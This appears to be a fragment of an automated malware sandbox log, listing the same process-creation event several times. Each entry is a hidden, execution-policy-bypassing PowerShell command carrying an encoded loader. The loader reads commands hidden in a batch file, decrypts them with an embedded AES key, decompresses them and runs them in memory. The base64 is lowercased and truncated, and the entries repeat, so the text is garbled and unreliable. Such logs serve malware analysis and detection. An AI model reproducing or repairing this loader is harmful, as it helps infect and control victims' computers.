"[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command 